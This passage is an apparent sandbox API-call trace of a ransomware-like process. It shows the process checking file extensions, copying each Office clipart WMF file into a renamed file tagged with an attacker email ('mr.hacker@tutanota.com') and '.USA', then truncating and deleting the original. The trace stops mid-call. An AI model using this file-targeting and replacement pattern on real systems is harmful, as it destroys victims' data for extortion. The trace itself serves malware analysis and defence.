lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.066] lstrlenW (lpString=".jpg") returned 4 [0270.066] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.066] lstrlenW (lpString=".doc") returned 4 [0270.066] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.066] lstrlenW (lpString=".docx") returned 5 [0270.066] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.066] lstrlenW (lpString=".pdf") returned 4 [0270.066] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.066] lstrlenW (lpString=".xls") returned 4 [0270.066] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.066] lstrlenW (lpString=".xlsx") returned 5 [0270.066] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.066] lstrlenW (lpString=".ppt") returned 4 [0270.066] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.066] lstrlenW (lpString=".zip") returned 4 [0270.066] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.066] lstrlenW (lpString=".rar") returned 4 [0270.066] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.066] lstrlenW (lpString=".bz2") returned 4 [0270.066] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.067] lstrlenW (lpString=".7z") returned 3 [0270.067] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.067] lstrlenW (lpString=".dbf") returned 4 [0270.067] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.067] lstrlenW (lpString=".1cd") returned 4 [0270.067] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.067] lstrlenW (lpString=".jpg") returned 4 [0270.067] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.067] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.067] lstrlenW (lpString="DD01182_.WMF") returned 12 [0270.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.067] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2996) returned 1 [0270.067] CloseHandle (hObject=0x390) returned 1 [0270.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 0x20 [0270.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.068] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.068] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.068] GetLastError () returned 0x0 [0270.068] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xbb4, lpOverlapped=0x0) returned 1 [0270.070] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xbc0, lpOverlapped=0x0) returned 1 [0270.071] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.071] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.071] SetEndOfFile (hFile=0x3a4) returned 1 [0270.071] CloseHandle (hObject=0x3a4) returned 1 [0270.071] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.071] SetEndOfFile (hFile=0x390) returned 1 [0270.073] CloseHandle (hObject=0x390) returned 1 [0270.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.073] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 1 [0270.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.073] lstrlenW (lpString=".doc") returned 4 [0270.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.073] lstrlenW (lpString=".docx") returned 5 [0270.073] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.073] lstrlenW (lpString=".pdf") returned 4 [0270.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString=".xls") returned 4 [0270.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.074] lstrlenW (lpString=".xlsx") returned 5 [0270.074] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.074] lstrlenW (lpString=".ppt") returned 4 [0270.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.074] lstrlenW (lpString=".zip") returned 4 [0270.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.074] lstrlenW (lpString=".rar") returned 4 [0270.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString=".bz2") returned 4 [0270.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString=".7z") returned 3 [0270.074] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.074] lstrlenW (lpString=".dbf") returned 4 [0270.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.074] lstrlenW (lpString=".1cd") returned 4 [0270.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.074] lstrlenW (lpString=".jpg") returned 4 [0270.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.075] lstrlenW (lpString=".doc") returned 4 [0270.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.075] lstrlenW (lpString=".docx") returned 5 [0270.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.075] lstrlenW (lpString=".pdf") returned 4 [0270.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.075] lstrlenW (lpString=".xls") returned 4 [0270.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.075] lstrlenW (lpString=".xlsx") returned 5 [0270.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.075] lstrlenW (lpString=".ppt") returned 4 [0270.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.075] lstrlenW (lpString=".zip") returned 4 [0270.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.075] lstrlenW (lpString=".rar") returned 4 [0270.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.075] lstrlenW (lpString=".bz2") returned 4 [0270.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.075] lstrlenW (lpString=".7z") returned 3 [0270.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.076] lstrlenW (lpString=".dbf") returned 4 [0270.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.076] lstrlenW (lpString=".1cd") returned 4 [0270.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0270.076] lstrlenW (lpString=".jpg") returned 4 [0270.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.076] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.076] lstrlenW (lpString="DD01183_.WMF") returned 12 [0270.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.076] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2296) returned 1 [0270.076] CloseHandle (hObject=0x390) returned 1 [0270.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 0x20 [0270.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.077] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.077] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.143] GetLastError () returned 0x0 [0270.143] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x8f8, lpOverlapped=0x0) returned 1 [0270.145] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x900, lpOverlapped=0x0) returned 1 [0270.146] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.146] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.146] SetEndOfFile (hFile=0x3a4) returned 1 [0270.146] CloseHandle (hObject=0x3a4) returned 1 [0270.147] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.147] SetEndOfFile (hFile=0x390) returned 1 [0270.149] CloseHandle (hObject=0x390) returned 1 [0270.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 1 [0270.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.162] lstrlenW (lpString=".doc") returned 4 [0270.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString=".docx") returned 5 [0270.162] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.162] lstrlenW (lpString=".pdf") returned 4 [0270.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString=".xls") returned 4 [0270.162] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.162] lstrlenW (lpString=".xlsx") returned 5 [0270.162] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.162] lstrlenW (lpString=".ppt") returned 4 [0270.162] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.162] lstrlenW (lpString=".zip") returned 4 [0270.162] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.162] lstrlenW (lpString=".rar") returned 4 [0270.162] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString=".bz2") returned 4 [0270.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString=".7z") returned 3 [0270.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.162] lstrlenW (lpString=".dbf") returned 4 [0270.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.162] lstrlenW (lpString=".1cd") returned 4 [0270.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.162] lstrlenW (lpString=".jpg") returned 4 [0270.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.163] lstrlenW (lpString=".doc") returned 4 [0270.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString=".docx") returned 5 [0270.163] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.163] lstrlenW (lpString=".pdf") returned 4 [0270.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString=".xls") returned 4 [0270.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.163] lstrlenW (lpString=".xlsx") returned 5 [0270.163] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.163] lstrlenW (lpString=".ppt") returned 4 [0270.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.163] lstrlenW (lpString=".zip") returned 4 [0270.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.163] lstrlenW (lpString=".rar") returned 4 [0270.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString=".bz2") returned 4 [0270.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString=".7z") returned 3 [0270.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.163] lstrlenW (lpString=".dbf") returned 4 [0270.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.163] lstrlenW (lpString=".1cd") returned 4 [0270.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0270.164] lstrlenW (lpString=".jpg") returned 4 [0270.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.164] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.164] lstrlenW (lpString="DD01628_.WMF") returned 12 [0270.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.164] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=19068) returned 1 [0270.165] CloseHandle (hObject=0x328) returned 1 [0270.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 0x20 [0270.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.165] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.165] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.165] GetLastError () returned 0x0 [0270.165] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x4a7c, lpOverlapped=0x0) returned 1 [0270.180] WriteFile (in: hFile=0x394, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x4a80, lpOverlapped=0x0) returned 1 [0270.181] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.182] WriteFile (in: hFile=0x394, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.182] SetEndOfFile (hFile=0x394) returned 1 [0270.249] CloseHandle (hObject=0x394) returned 1 [0270.249] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.249] SetEndOfFile (hFile=0x328) returned 1 [0270.258] CloseHandle (hObject=0x328) returned 1 [0270.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 1 [0270.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.298] lstrlenW (lpString=".doc") returned 4 [0270.299] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString=".docx") returned 5 [0270.299] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.299] lstrlenW (lpString=".pdf") returned 4 [0270.299] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString=".xls") returned 4 [0270.299] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.299] lstrlenW (lpString=".xlsx") returned 5 [0270.299] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.299] lstrlenW (lpString=".ppt") returned 4 [0270.299] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.299] lstrlenW (lpString=".zip") returned 4 [0270.299] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.299] lstrlenW (lpString=".rar") returned 4 [0270.299] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString=".bz2") returned 4 [0270.299] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString=".7z") returned 3 [0270.299] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.299] lstrlenW (lpString=".dbf") returned 4 [0270.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.299] lstrlenW (lpString=".1cd") returned 4 [0270.299] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.299] lstrlenW (lpString=".jpg") returned 4 [0270.300] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.300] lstrlenW (lpString=".doc") returned 4 [0270.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString=".docx") returned 5 [0270.300] 